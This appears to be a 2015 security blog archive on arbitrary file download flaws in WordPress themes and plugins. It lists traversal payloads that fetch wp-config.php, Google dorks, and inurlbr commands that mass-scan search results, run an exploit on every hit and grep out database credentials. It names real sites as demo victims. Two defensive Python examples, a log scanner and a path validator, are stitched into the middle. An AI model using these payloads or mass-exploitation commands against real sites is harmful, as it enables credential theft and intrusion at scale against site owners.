
Showing posts with label Arbitrary File Download.

Tuesday, June 9, 2015

WordPress Plugin 'WP Mobile Edition' LFI Vulnerability

Exploring wordpress plugin LFI using inurlbr in subprocess

Inurlbr Team
[+]=========== Assume NO ============[+]
 Liability and are not responsible
for any misuse or damage caused
 by this program!!
[+]==================================[+]

USAGE:

Make a file named payload.txt and put inside:
/wp-content/themes/mTheme-Unus/css/css.php?files=../../../../wp-config.php

OTHER VULNERABLE PATHS (exploits):

/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
/wp-content/force-download.php?file=../wp-config.php
/wp-content/themes/acento/includes/view-pdf.php?download=1&file=/path/wp-config.php
/wp-content/themes/SMWF/inc/download.php?file=../wp-config.php
/wp-content/themes/markant/download.php?file=../../wp-config.php
/wp-content/themes/yakimabait/download.php?file=./wp-config.php
/wp-content/themes/TheLoft/download.php?file=../../../wp-config.php
/wp-content/themes/felis/download.php?file=../wp-config.php
/wp-content/themes/MichaelCanthony/download.php?file=../../../wp-config.php
/wp-content/themes/trinity/lib/scripts/download.php?file=../../../../../wp-config.php
/wp-content/themes/epic/includes/download.php?file=wp-config.php
/wp-content/themes/urbancity/lib/scripts/download.php?file=../../../../../wp-config.php
/wp-content/themes/antioch/lib/scripts/download.php?file=../../../../../wp-config.php
/wp-content/themes/authentic/includes/download.php?file=../../../../wp-config.php
/wp-content/themes/churchope/lib/downloadlink.php?file=../../../../wp-config.php
/wp-content/themes/lote27/download.php?download=../../../wp-config.php
/wp-content/themes/linenity/functions/download.php?imgurl=../../../../wp-config.php
/wp-content/plugins/ajax-store-locator-wordpress_0/sl_file_download.php?download_file=../../../wp-config.php
/wp-content/plugins/justified-image-grid/download.php?file=file:///C:/wamp/www/wp-config.php
/wp-content/plugins/justified-image-grid/download.php?file=file:///C:/xampp/htdocs/wp-config.php
/wp-content/plugins/justified-image-grid/download.php?file=file:///var/www/wp-config.php
/wp-content/plugins/aspose-doc-exporter/aspose_doc_exporter_download.php?file=../../../wp-config.php
/wp-content/plugins/aspose-cloud-ebook-generator/aspose_posts_exporter_download.php?file=../../../wp-config.php
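As an added defensive example (not code from this post or from the inurlbr project), the following Python script scans web-server access-log lines for requests that match the patterns listed above: a file-naming parameter (file, files, img, download, download_file, imgurl) carrying `..` traversal, a `file://` URI or an absolute path, or naming wp-config.php directly, with the revslider_show_image AJAX action and the theme/plugin download handlers above called out separately. The log lines, IP addresses and function names are constructed for the example; a 200 status on a flagged request is the signal that the file was probably served.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Query parameters that the endpoints listed above use to name the file to serve.
FILE_PARAMS = {"file", "files", "img", "download", "download_file", "imgurl"}

# Script names of the theme/plugin download handlers listed above.
DOWNLOAD_HANDLERS = (
    "download.php", "downloadlink.php", "view-pdf.php", "force-download.php",
    "sl_file_download.php", "css.php", "aspose_doc_exporter_download.php",
    "aspose_posts_exporter_download.php",
)

# Apache/nginx combined log format; the constructed sample lines below use it.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<url>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)


def suspicious_value(value):
    """Reason a file-parameter value looks like an arbitrary-file-download attempt, or None."""
    # Undo double URL-encoding and normalise Windows separators before matching.
    v = unquote(unquote(value)).replace("\\", "/").lower()
    if ".." in v:
        return "path traversal"
    if v.startswith(("file:", "/")):
        return "absolute path or file:// URI"
    if v.endswith("wp-config.php"):
        return "wp-config.php requested"
    return None


def classify_request(url):
    """Return the list of reasons a request URL is suspicious (empty list when benign)."""
    parts = urlsplit(url)
    path = parts.path.lower()
    params = dict(parse_qsl(parts.query, keep_blank_values=True))
    reasons = []
    for name, value in params.items():
        if name.lower() in FILE_PARAMS:
            why = suspicious_value(value)
            if why:
                reasons.append(f"{name}: {why}")
    if reasons and params.get("action") == "revslider_show_image":
        reasons.append("via revslider_show_image AJAX action")
    elif reasons and path.endswith(DOWNLOAD_HANDLERS):
        reasons.append("via known theme/plugin download handler")
    return reasons


def scan_log(lines):
    """Run classify_request over access-log lines and collect the flagged requests."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not in combined format; skip rather than guess
        reasons = classify_request(m["url"])
        if reasons:
            findings.append({
                "ip": m["ip"],
                "url": m["url"],
                "status": int(m["status"]),
                "likely_disclosed": m["status"] == "200",  # 200 = handler returned content
                "reasons": reasons,
            })
    return findings


# Constructed sample log lines using documentation IP ranges; not from any real server.
LOG_LINES = [
    '203.0.113.5 - - [09/Jun/2015:10:00:01 +0000] "GET /wp-content/themes/epic/includes/download.php?file=brochure.pdf HTTP/1.1" 200 5120',
    '203.0.113.5 - - [09/Jun/2015:10:00:02 +0000] "GET /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php HTTP/1.1" 200 3320',
    '198.51.100.7 - - [09/Jun/2015:10:00:03 +0000] "GET /wp-content/themes/mTheme-Unus/css/css.php?files=..%2F..%2F..%2F..%2Fwp-config.php HTTP/1.1" 200 3320',
    '198.51.100.7 - - [09/Jun/2015:10:00:04 +0000] "GET /wp-content/plugins/justified-image-grid/download.php?file=file:///var/www/wp-config.php HTTP/1.1" 404 209',
    '192.0.2.9 - - [09/Jun/2015:10:00:05 +0000] "GET /?fdx_switcher=mobile HTTP/1.1" 200 8800',
]

if __name__ == "__main__":
    for f in scan_log(LOG_LINES):
        state = "likely disclosed" if f["likely_disclosed"] else "not served"
        print(f["ip"], f["status"], state, f["url"], "|", "; ".join(f["reasons"]))
```

The benign brochure download and the mobile-switcher hit are not flagged; the three attempts are, and the 404 on the file:// request is reported as not served. Treat a flagged request with status 200 as a confirmed disclosure of wp-config.php and rotate the database credentials and salts it contains.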


EXPLOIT COMMAND:
php inurlbr.php --dork 'inurl:?fdx_switcher=mobile' -q [your favorite engines] -s scan.txt --get-file 'payload.txt' --sub-get --unique


SCANNER INURLBR:
https://github.com/googleinurl/SCANNER-INURLBR

REF:
https://www.exploit-db.com/exploits/37244/
http://blog.inurl.com.br/2015/04/conceito-de-subprocess-scanner-inurlbr.html

Monday, January 19, 2015

0days Theme Arbitrary File Download Vulnerability + SCANNER INURLBR / EXPLOIT INURL A.F.D Verification

-------------------------------------------------------------------------------------------

Wordpress Theme U-Design Arbitrary File Download Vulnerability
DORK: inurl:"wp-content/themes/u-design/"
ACCESS: http://1337day.com/exploit/23143

-------------------------------------------------------------------------------------------

Wordpress Theme Terra Arbitrary File Download Vulnerability
DORK: inurl:"wp-content/themes/terra/"
ACCESS: http://1337day.com/exploit/23142
-------------------------------------------------------------------------------------------

Wordpress Theme Pindol Arbitrary File Download Vulnerability
DORK: inurl:"wp-content/themes/pindol/"
ACCESS: http://1337day.com/exploit/23144
-------------------------------------------------------------------------------------------

All of the themes above fail through the same bundled revslider plugin.
POC:
http://[target]/[path]/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
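The handlers above hand the file parameter straight to the filesystem. As an added example (not code from this post or from any of the themes or plugins named), the following Python function shows the validation such a download handler needs: reject URI schemes, absolute paths and backslashes, canonicalise with realpath so `../` and symlinks are resolved, confirm the result is still under the upload directory, and allow-list the file types actually served. The base directory and the function name are assumptions made for the example.

```python
import os
import re

# Anything that looks like "scheme:" (file:, http:, c:) is refused outright.
SCHEME_RE = re.compile(r"^[A-Za-z][A-Za-z0-9+.\-]*:")

# File types a download handler for uploads legitimately serves (assumed list).
ALLOWED_SUFFIXES = (".pdf", ".jpg", ".jpeg", ".png", ".gif", ".zip")


def check_download(requested, base_dir, allowed_suffixes=ALLOWED_SUFFIXES):
    """Validate a user-supplied file name for a download handler.

    Returns (True, absolute_path) when the file may be served, or
    (False, reason) when it must be refused. A real handler additionally
    checks that the path exists and is a regular file before sending it.
    """
    if not requested or "\x00" in requested:
        return False, "empty or NUL byte in name"
    if "\\" in requested:
        return False, "backslash in name"  # Windows separators: refuse, do not normalise
    if SCHEME_RE.match(requested):
        return False, "URI scheme in name"  # covers file:///... and C:/... values
    if requested.startswith("/"):
        return False, "absolute path"

    base = os.path.realpath(base_dir)
    # realpath collapses ../ segments and follows symlinks, so the containment
    # test below sees the path the OS would actually open.
    target = os.path.realpath(os.path.join(base, requested))
    if target == base or os.path.commonpath([base, target]) != base:
        return False, "escapes base directory"
    if not target.lower().endswith(allowed_suffixes):
        return False, "file type not allowed"  # blocks wp-config.php even inside base
    return True, target


if __name__ == "__main__":
    # Constructed base directory for the demonstration; it need not exist.
    base = "/srv/example-site/wp-content/uploads"
    for name in ["2015/06/brochure.pdf", "../../wp-config.php",
                 "file:///srv/example-site/wp-config.php", "wp-config.php"]:
        print(repr(name), "->", check_download(name, base))
```

The suffix allow-list is the second line of defence: a value such as `..%2F..%2Fwp-config.php` that was never URL-decoded stays inside the base directory after realpath, and only the type check stops it.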

[EXPLOIT]: Wordpress A.F.D Verification/ INURL - BRASIL

The exploit we developed checks about 20 themes and also checks the standard path: POC -> /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
This is the same path as the 0day mentioned above.

[Exploit ACCESS]
http://pastebin.com/ZEnbxXXd
http://packetstormsecurity.com/files/129706/WordPress-Themes-download.php-File-Disclosure.html
Download the exploit and save it under the name exploit.php.

Now let's use the inurlbr scanner to drive the exploit against many targets at once.
[SCANNER INURLBR]
https://github.com/googleinurl/SCANNER-INURLBR

INURLBR command usage:
Ex: php inurlbr.php --dork 'your dork' -q 1,6 -s save.txt --comand-all 'php exploit.php _TARGET_'

php inurlbr.php --dork 'inurl:"wp-content/themes/u-design/"' -q 1,6 -s save.txt --comand-all 'php exploit.php _TARGET_'

php inurlbr.php --dork 'inurl:"wp-content/themes/terra/"' -q 1,6 -s save.txt --comand-all 'php exploit.php _TARGET_'

php inurlbr.php --dork 'inurl:"wp-content/themes/pindol/"' -q 1,6 -s save.txt --comand-all 'php exploit.php _TARGET_'

Brief introduction to --comand
--comand-vul Runs the given command for every vulnerable URL found.
     Example: --comand-vul {command}
     Usage:   --comand-vul 'nmap sV -p 22,80,21 _TARGET_'
              --comand-vul './exploit.sh _TARGET_ output.txt'
 --comand-all Use this option to specify a single command to run for EVERY URL found.
     Example: --comand-all {command}
     Usage:   --comand-all 'nmap sV -p 22,80,21 _TARGET_'
              --comand-all './exploit.sh _TARGET_ output.txt'
    Observation:
    _TARGET_ is replaced by the URL/target found; if the user does not supply
    a GET string, only the domain is passed to the command.
   _TARGETFULL_ is replaced by the original URL / target found.

-------------------------------------------------------------------------------------------

INURLBR ADVANCED CONTROL

php inurlbr.php --dork 'YOU DORK revslider' -q 1,6 -s wordpress2.txt --exploit-get '/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php' -t 3 --exploit-comand '/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php' --comand-all 'echo "_TARGET__EXPLOIT_">> curlwordpress.txt;curl "_TARGET__EXPLOIT_"|grep "DB_" >> curlwordpress.txt;curl "_TARGET__EXPLOIT_"|grep "DB_"'



[TUTORIAL] - Wordpress A.F.D Verification/ INURL - BRASIL + SCANNER INURLBR



[TUTORIAL] - Hacking WordPress Panel - Slider Revolution


[TUTORIAL] - Getting access to the Wordpress panel


REF:
http://pastebin.com/cGpxRQCs
http://blog.inurl.com.br/2015/01/arbitrary-file-download-vulnerability.html
http://blog.inurl.com.br/2015/01/wordpress-themes-downloadphp-file.html
http://blog.inurl.com.br/2014/08/wordpress-plugin-kenburner-slider-lfd.html
https://github.com/googleinurl/SCANNER-INURLBR#---definindo-comando-externo

Sunday, January 18, 2015

Arbitrary File Download vulnerability in the WordPress theme Bretheon


Arbitrary File Download vulnerability, which I call A.F.D.
Such a flaw was found in the Bretheon WordPress theme.
--------------------------------------------------------------------------------------------------------------

DETAILS
Access: http://1337day.com/exploit/23140
Exploit Title: Wordpress Theme Bretheon Arbitrary File Download Vulnerability
Date: 17/01/2014
Exploit Author: MindCracker - Team MaDLeeTs
Contact : Md5@live.com.pk - Maddy@live.com.pk | https://twitter.com/MindCrackerKhan
Tested on: Linux / Windows

Google Dork: inurl:wp-content/themes/bretheon/
Demo

http://infiniteloopcorp.com/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
http://scottysgym.com.au/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
http://vladlogistik.ru/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
http://transinfo.nnov.ru/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php

PoC

http://target/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
--------------------------------------------------------------------------------------------------------------

Since this flaw in the theme uses nothing new and follows the standard path "admin-ajax.php?action=revslider_show_image&img=", the exploit we developed months ago already performs this check and can be used as-is.
--------------------------------------------------------------------------------------------------------------

[TUTORIAL]:

https://www.youtube.com/watch?v=w6pxPR_s05w

TUTORIAL DETAILS:
http://blog.inurl.com.br/2015/01/wordpress-themes-downloadphp-file.html

EXECUTE:
php exploit.php www.target.gov.us
--------------------------------------------------------------------------------------------------------------

[EXPLOIT]: Wordpress A.F.D Verification/ INURL - BRASIL

http://pastebin.com/ZEnbxXXd
http://packetstormsecurity.com/files/129706/WordPress-Themes-download.php-File-Disclosure.html
--------------------------------------------------------------------------------------------------------------